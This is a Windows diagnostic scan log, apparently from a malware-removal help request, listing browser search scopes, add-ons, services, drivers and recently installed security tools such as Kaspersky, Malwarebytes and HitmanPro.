SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.com/rover/1/711-154371-11896-2/4?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
SearchScopes: HKU\S-1-5-21-2762839642-1568754923-376086736-1001 -> DefaultScope {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = https://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=282369&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2762839642-1568754923-376086736-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=HPNTDFJS
SearchScopes: HKU\S-1-5-21-2762839642-1568754923-376086736-1001 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = https://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=282369&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2762839642-1568754923-376086736-1001 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.com/rover/1/711-154371-11896-2/4?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
BHO: Content Blocker Plugin -> {03C04F0A-E2A3-4F7F-BA30-BFA06FFD1358} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\x64\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)
BHO: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft)
BHO: Virtual Keyboard Plugin -> {B5D5BB14-C8E2-478D-9C97-574AC10AF9E8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\x64\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)
BHO: Safe Money Plugin -> {E3D96E85-529D-4269-AC6A-97CF9E2221E3} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\x64\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)
BHO: ClassicIE9BHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIE9DLL_64.dll (IvoSoft)
BHO-x32: Content Blocker Plugin -> {03C04F0A-E2A3-4F7F-BA30-BFA06FFD1358} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32:
ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft) BHO-x32: Virtual Keyboard Plugin -> {B5D5BB14-C8E2-478D-9C97-574AC10AF9E8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\IEExt\ie_plugin.dll (Kaspersky Lab ZAO) BHO-x32: Safe Money Plugin -> {E3D96E85-529D-4269-AC6A-97CF9E2221E3} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\IEExt\ie_plugin.dll (Kaspersky Lab ZAO) BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard) BHO-x32: ClassicIE9BHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIE9DLL_32.dll (IvoSoft) Toolbar: HKLM - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft) Toolbar: HKLM-x32 - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 FireFox: ======== FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.) 
FF Plugin-x32: @authentec.com/ffwloplugin -> C:\Program Files (x86)\HP SimplePass\npffwloplugin.dll ( HP)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @kaspersky.com/content_blocker_6418E0D362104DADA084DC312DFA8ABC -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\content_blocker@kaspersky.com ()
FF Plugin-x32: @kaspersky.com/online_banking_69A4E213815F42BD863D889007201D82 -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\online_banking@kaspersky.com ()
FF Plugin-x32: @kaspersky.com/virtual_keyboard_294FF26A1D5B455495946778FDE7CEDB -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\virtual_keyboard@kaspersky.com ()
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @Nero.com/KM -> C:\PROGRA~2\COMMON~1\Nero\BROWSE~1\NPBROW~1.DLL (Nero AG)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM-x32\...\Firefox\Extensions: [content_blocker_6418E0D362104DADA084DC312DFA8ABC@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\content_blocker@kaspersky.com
FF Extension: Dangerous Websites Blocker - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\content_blocker@kaspersky.com [2014-12-01]
FF HKLM-x32\...\Firefox\Extensions: [virtual_keyboard_294FF26A1D5B455495946778FDE7CEDB@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\virtual_keyboard@kaspersky.com
FF Extension: Virtual Keyboard - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\virtual_keyboard@kaspersky.com [2014-12-01]
FF HKLM-x32\...\Firefox\Extensions: [online_banking_69A4E213815F42BD863D889007201D82@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\online_banking@kaspersky.com
FF Extension: Safe Money - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\online_banking@kaspersky.com [2014-12-01]
Chrome:
=======
CHR Profile: C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-05-08]
CHR Extension: (Google Drive) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-05-08]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-09-23]
CHR Extension: (YouTube) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-05-08]
CHR Extension: (Google Search) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-05-08]
CHR Extension: (Kaspersky Protection) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\dbhjdbfgekjfcfkkfjjmlmojhbllhbho [2014-12-01]
CHR Extension: (Website Logon) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\fegekclkdhbnfdcmomlpegkkndgnmfmo [2014-05-08]
CHR Extension: (Google Wallet) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-05-08]
CHR Extension: (Gmail) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-05-08]
CHR HKLM-x32\...\Chrome\Extension: [dbhjdbfgekjfcfkkfjjmlmojhbllhbho] - https://chrome.google.com/webstore/detail/dbhjdbfgekjfcfkkfjjmlmojhbllhbho []
CHR HKLM-x32\...\Chrome\Extension: [fegekclkdhbnfdcmomlpegkkndgnmfmo] - C:\Program Files (x86)\HP SimplePass\tschrome.crx [2012-07-12]
==================== Services (Whitelisted) =================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R2 ADExchange; C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe [39528 2011-09-16] (ArcSoft Inc.)
S2 AVP15.0.1; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\avp.exe [234520 2014-08-30] (Kaspersky Lab ZAO) R2 ClassicShellService; C:\Program Files\Classic Shell\ClassicShellService.exe [68608 2012-12-29] (IvoSoft) [File not signed] R2 FPLService; C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe [1641320 2012-08-10] (HP) R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [85504 2012-08-10] (Hewlett-Packard Company) [File not signed] R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation) R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation) R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation) R2 nlsX86cc; C:\Windows\SysWOW64\nlssrv32.exe [66560 2011-02-04] (Nalpeiron Ltd.) [File not signed] R2 STacSV; C:\Program Files\IDT\WDM\STacSV64.exe [321536 2012-07-21] (IDT, Inc.) [File not signed] S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed] R3 TrueService; C:\Program Files\Common Files\AuthenTec\TrueService.exe [401256 2012-07-16] (AuthenTec, Inc.) R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [28160 2012-09-06] () [File not signed] S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [16032 2014-09-21] (Microsoft Corporation) ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) 
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink) R0 cm_km_w; C:\Windows\System32\DRIVERS\cm_km_w.sys [238288 2013-01-14] (Kaspersky Lab UK Ltd) S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2014-12-01] () R0 kl1; C:\Windows\System32\DRIVERS\kl1.sys [468576 2014-03-31] (Kaspersky Lab ZAO) R2 kldisk; C:\Windows\system32\DRIVERS\kldisk.sys [46144 2014-07-02] (Kaspersky Lab ZAO) S0 klelam; C:\Windows\System32\DRIVERS\klelam.sys [29616 2012-07-27] (Kaspersky Lab) R3 klflt; C:\Windows\system32\DRIVERS\klflt.sys [150536 2014-08-18] (Kaspersky Lab ZAO) R1 klhk; C:\Windows\system32\DRIVERS\klhk.sys [247480 2014-08-12] (Kaspersky Lab ZAO) R1 KLIF; C:\Windows\System32\DRIVERS\klif.sys [801288 2014-08-20] (Kaspersky Lab ZAO) R1 KLIM6; C:\Windows\system32\DRIVERS\klim6.sys [30304 2014-02-25] (Kaspersky Lab ZAO) S3 klkbdflt; C:\Windows\system32\DRIVERS\klkbdflt.sys [28768 2014-03-28] (Kaspersky Lab ZAO) S3 klmouflt; C:\Windows\system32\DRIVERS\klmouflt.sys [29280 2013-08-08] (Kaspersky Lab ZAO) R1 klpd; C:\Windows\system32\DRIVERS\klpd.sys [15456 2013-04-12] (Kaspersky Lab ZAO) R1 klwfp; C:\Windows\system32\DRIVERS\klwfp.sys [69816 2014-07-25] (Kaspersky Lab ZAO) R1 Klwtp; C:\Windows\system32\DRIVERS\klwtp.sys [74424 2014-08-13] (Kaspersky Lab ZAO) R1 kneps; C:\Windows\system32\DRIVERS\kneps.sys [179776 2014-07-09] (Kaspersky Lab ZAO) R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation) R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-12-01] (Malwarebytes Corporation) R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2014-10-01] (Malwarebytes Corporation) S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-08-24] (Synaptics Incorporated) R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [43832 2012-08-24] (Synaptics Incorporated) U3 TrueSight; C:\Windows\System32\Drivers\TrueSight.sys 
[34808 2014-11-19] () R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20288 2012-08-03] (Hewlett-Packard Development Company, L.P.) S3 ALSysIO; \??\C:\Users\ADMINI~1\AppData\Local\Temp\ALSysIO64.sys [X] S1 bcbus; \SystemRoot\System32\drivers\bcbus.sys [X] R4 klkbdflt2; \SystemRoot\system32\DRIVERS\klkbdflt2.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-12-01 09:39 - 2014-12-01 09:39 - 00002330 _____ () C:\Users\johnsmith\Desktop\Safe Money.lnk 2014-12-01 09:38 - 2014-12-01 09:38 - 00002132 _____ () C:\Users\Public\Desktop\Kaspersky Internet Security.lnk 2014-12-01 09:38 - 2014-12-01 09:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kaspersky Internet Security 2014-12-01 09:38 - 2013-05-06 09:13 - 00110176 _____ (Kaspersky Lab ZAO) C:\Windows\system32\klfphc.dll 2014-12-01 09:36 - 2014-12-01 09:43 - 00000000 ____D () C:\ProgramData\Kaspersky Lab 2014-12-01 09:36 - 2014-12-01 09:36 - 00000000 ____D () C:\Program Files (x86)\Kaspersky Lab 2014-12-01 09:36 - 2014-08-20 18:04 - 00801288 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\klif.sys 2014-12-01 09:36 - 2014-08-18 14:43 - 00150536 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\klflt.sys 2014-12-01 09:36 - 2014-08-12 18:32 - 00247480 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\klhk.sys 2014-12-01 09:28 - 2014-12-01 09:28 - 05005408 _____ () C:\Windows\system32\FNTCACHE.DAT 2014-12-01 09:25 - 2014-11-20 13:56 - 00713672 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2014-12-01 09:25 - 2014-11-20 13:56 - 00106440 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2014-12-01 
07:58 - 2014-12-01 09:30 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable) 2014-12-01 07:58 - 2014-12-01 07:58 - 00000117 _____ () C:\Windows\system32\netcfg-763703.txt 2014-12-01 07:57 - 2014-12-01 08:59 - 00000000 ____D () C:\Users\johnsmith\Desktop\mbar 2014-12-01 07:56 - 2014-12-01 07:56 - 00000117 _____ () C:\Windows\system32\netcfg-627218.txt 2014-12-01 07:56 - 2014-12-01 07:56 - 00000117 _____ () C:\Windows\system32\netcfg-624156.txt 2014-12-01 07:56 - 2014-12-01 07:56 - 00000117 _____ () C:\Windows\system32\netcfg-618343.txt 2014-12-01 07:51 - 2014-12-01 07:51 - 00001139 _____ () C:\Windows\system32\netcfg-333515.txt 2014-12-01 07:51 - 2014-12-01 07:51 - 00001134 _____ () C:\Windows\system32\netcfg-329937.txt 2014-12-01 07:48 - 2014-12-01 07:48 - 00000117 _____ () C:\Windows\system32\netcfg-157515.txt 2014-12-01 07:47 - 2014-12-01 07:47 - 00043664 _____ () C:\Windows\system32\Drivers\hitmanpro37.sys 2014-12-01 07:22 - 2014-12-01 07:37 - 16448208 _____ (Malwarebytes Corp.) 
C:\Users\johnsmith\Desktop\mbar-1.08.2.1001.exe 2014-12-01 01:34 - 2014-10-08 21:00 - 01519104 _____ (Microsoft Corporation) C:\Windows\system32\vssapi.dll 2014-12-01 01:34 - 2014-10-08 21:00 - 01484288 _____ (Microsoft Corporation) C:\Windows\system32\VSSVC.exe 2014-12-01 01:34 - 2014-10-08 21:00 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\vsstrace.dll 2014-12-01 01:34 - 2014-10-08 20:59 - 01195520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vssapi.dll 2014-12-01 01:34 - 2014-10-08 20:59 - 00052224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vsstrace.dll 2014-12-01 01:34 - 2012-09-19 23:31 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\eventcls.dll 2014-12-01 01:34 - 2012-09-19 22:53 - 00015360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\eventcls.dll 2014-11-30 23:38 - 2014-06-10 15:44 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe 2014-11-30 23:38 - 2014-06-10 15:43 - 00035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe 2014-11-30 23:23 - 2014-10-11 00:44 - 19764736 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll 2014-11-30 23:23 - 2014-10-10 22:57 - 17562112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll 2014-11-30 23:23 - 2014-10-08 20:59 - 00623616 _____ (Microsoft Corporation) C:\Windows\system32\dnsapi.dll 2014-11-30 23:23 - 2014-10-08 20:59 - 00212992 _____ (Microsoft Corporation) C:\Windows\system32\dnsrslvr.dll 2014-11-30 23:23 - 2014-10-08 20:58 - 00458240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnsapi.dll 2014-11-30 23:23 - 2014-09-21 22:38 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\mfmpeg2srcsnk.dll 2014-11-30 23:23 - 2014-09-21 20:56 - 00513536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmpeg2srcsnk.dll 2014-11-30 23:23 - 2014-04-19 02:39 - 00628024 _____ (Microsoft Corporation) C:\Windows\system32\NotificationUI.exe 2014-11-30 23:23 - 2014-04-19 01:45 - 00693760 _____ (Microsoft Corporation) 
C:\Windows\system32\WSShared.dll 2014-11-30 23:23 - 2014-04-19 01:45 - 00163840 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.TestingFramework.dll 2014-11-30 23:23 - 2014-04-18 23:57 - 00566784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSShared.dll 2014-11-30 23:23 - 2014-04-18 23:57 - 00124928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll 2014-11-30 23:23 - 2014-01-30 17:48 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.dll 2014-11-30 23:19 - 2014-10-11 00:45 - 10115072 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll 2014-11-30 23:19 - 2014-10-11 00:44 - 02885632 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll 2014-11-30 23:19 - 2014-10-11 00:44 - 00393216 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll 2014-11-30 23:19 - 2014-10-11 00:43 - 02307072 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll 2014-11-30 23:19 - 2014-10-10 22:58 - 08858624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll 2014-11-30 23:19 - 2014-10-10 22:57 - 02416640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll 2014-11-30 23:19 - 2014-10-10 22:57 - 00295424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll 2014-11-30 23:19 - 2014-10-10 22:56 - 02037760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll 2014-11-30 23:19 - 2014-06-12 16:34 - 00754176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\actxprxy.dll 2014-11-30 23:19 - 2014-06-12 16:29 - 02146304 _____ (Microsoft Corporation) C:\Windows\system32\actxprxy.dll 2014-11-30 23:19 - 2013-12-04 16:43 - 00583680 _____ (Microsoft Corporation) C:\Windows\system32\msdrm.dll 2014-11-30 23:19 - 2013-12-04 16:37 - 00451072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdrm.dll 2014-11-30 23:19 - 2013-03-02 01:23 - 00375808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ReAgent.dll 2014-11-30 23:19 - 
2013-03-01 19:44 - 01011200 _____ (Microsoft Corporation) C:\Windows\system32\reseteng.dll
2014-11-30 23:19 - 2012-12-14 21:55 - 00443392 _____ (Microsoft Corporation) C:\Windows\system32\ReAgent.dll
2014-11-30 23:18 - 2013-11-22 23:43 - 00420864 _____ (Microsoft Corporation) C:\Windows\system32\WMPhoto.dll
2014-11-30 23:18 - 2013-11-22 22:05 - 00368640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMPhoto.dll
2014-11-30 23:18 - 2013-08-23 00:22 - 02062848 _____ (Microsoft Corporation) C:\Windows\system32\d3d11.dll
2014-11-30 23:18 - 2013-08-22 18:44 - 01711616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11.dll
2014-11-30 23:18 - 2013-03-21 20:49 - 02382336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\esent.dll
2014-11-30 23:18 - 2013-03-21 15:47 - 02851840 _____ (Microsoft Corporation) C:\Windows\system32\esent.dll
2014-11-30 23:17 - 2014-01-30 17:48 - 01339392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2014-11-30 23:17 - 2014-01-30 17:06 - 01628160 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2014-11-30 23:17 - 2013-10-31 22:38 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\msieftp.dll
2014-11-30 23:17 - 2013-10-31 20:49 - 00273408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msieftp.dll
2014-11-30 23:17 - 2013-04-02 16:37 - 00025088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptdlg.dll
2014-11-30 23:17 - 2013-04-02 16:12 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\cryptdlg.dll
2014-11-30 23:17 - 2012-12-12 21:00 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-11-30 23:17 - 2012-12-12 20:59 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2014-11-30 23:06 - 2014-10-30 04:25 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-11-30 21:55 - 2014-11-30 21:55 - 00002362 _____ () C:\Windows\system32\.crusader
2014-11-30 21:38 - 2014-11-30 21:55 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-11-30 21:38 - 2014-11-30 21:38 - 00001893 _____ () C:\Users\Public\Desktop\HitmanPro.lnk
2014-11-30 21:38 - 2014-11-30 21:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HitmanPro
2014-11-30 21:38 - 2014-11-30 21:38 - 00000000 ____D () C:\Program Files\HitmanPro
2014-11-30 21:35 - 2014-10-31 23:26 - 103374192 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-11-30 21:30 - 2014-11-30 21:35 - 32507072 _____ (Microsoft Corporation) C:\Users\johnsmith\Downloads\Windows-KB890830-x64-V5.18.exe
2014-11-30 21:28 - 2014-11-30 21:36 - 11222744 _____ (SurfRight B.V.) C:\Users\johnsmith\Downloads\HitmanPro_x64.exe
2014-11-30 21:06 - 2014-12-01 09:52 - 00000000 ____D () C:\Users\johnsmith\Desktop\removal tools
2014-11-30 21:06 - 2014-12-01 09:52 - 00000000 ____D () C:\FRST
2014-11-30 20:48 - 2014-11-30 20:48 - 04184008 _____ (Kaspersky Lab ZAO) C:\Users\johnsmith\Downloads\tdsskiller.exe
2014-11-30 20:34 - 2014-11-30 20:34 - 00000117 _____ () C:\Windows\system32\netcfg-26750.txt
2014-11-30 20:33 - 2014-11-30 20:33 - 00000117 _____ () C:\Windows\system32\netcfg-2834125.txt
2014-11-30 20:23 - 2014-11-30 20:29 - 00000000 ____D () C:\Users\johnsmith\Desktop\ReportMaker
2014-11-30 20:09 - 2014-11-30 20:10 - 06360161 _____ () C:\Users\johnsmith\Downloads\ReportMaker.1417400617.exe
2014-11-30 20:01 - 2014-12-01 09:40 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-11-30 20:00 - 2014-12-01 07:57 - 00096472 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-11-30 20:00 - 2014-11-30 20:00 - 00001102 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-11-30 20:00 - 2014-11-30 20:00 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-11-30 20:00 - 2014-11-30 20:00 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-11-30 20:00 - 2014-11-30 20:00 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-11-30 20:00 - 2014-10-01 11:11 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-11-30 20:00 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-11-30 19:52 - 2014-11-30 19:52 - 00000117 _____ () C:\Windows\system32\netcfg-357703.txt
2014-11-30 19:47 - 2014-11-30 19:47 - 00000117 _____ () C:\Windows\system32\netcfg-96156.txt
2014-11-30 19:46 - 2014-12-01 09:28 - 00005748 _____ () C:\Windows\PFRO.log
2014-11-30 19:43 - 2014-11-30 19:43 - 00000167 _____ () C:\Windows\system32\netcfg-116564500.txt
2014-11-30 19:43 - 2014-11-30 19:43 - 00000117 _____ () C:\Windows\system32\netcfg-116559484.txt
2014-11-30 19:43 - 2014-11-30 19:43 - 00000117 _____ () C:\Windows\system32\netcfg-116556640.txt
2014-11-30 19:33 - 2014-11-30 21:40 - 202839360 _____ (Kaspersky Lab) C:\Users\johnsmith\Downloads\kis15.0.1.415EN_6874.exe
2014-11-30 10:16 - 2014-12-01 06:21 - 00961086 _____ () C:\Windows\WindowsUpdate.log
2014-11-29 12:11 - 2014-11-29 12:11 - 00000117 _____ () C:\Windows\system32\netcfg-3028671.txt
2014-11-29 12:11 - 2014-11-29 12:11 - 00000117 _____ () C:\Windows\system32\netcfg-3022500.txt
2014-11-27 13:22 - 2014-11-27 13:22 - 00000117 _____ () C:\Windows\system32\netcfg-45219796.txt
2014-11-27 13:22 - 2014-11-27 13:22 - 00000117 _____ () C:\Windows\system32\netcfg-45219750.txt
2014-11-27 12:51 - 2014-11-27 12:51 - 00000117 _____ () C:\Windows\system32\netcfg-43350140.txt
2014-11-27 12:51 - 2014-11-27 12:51 - 00000117 _____ () C:\Windows\system32\netcfg-43350078.txt
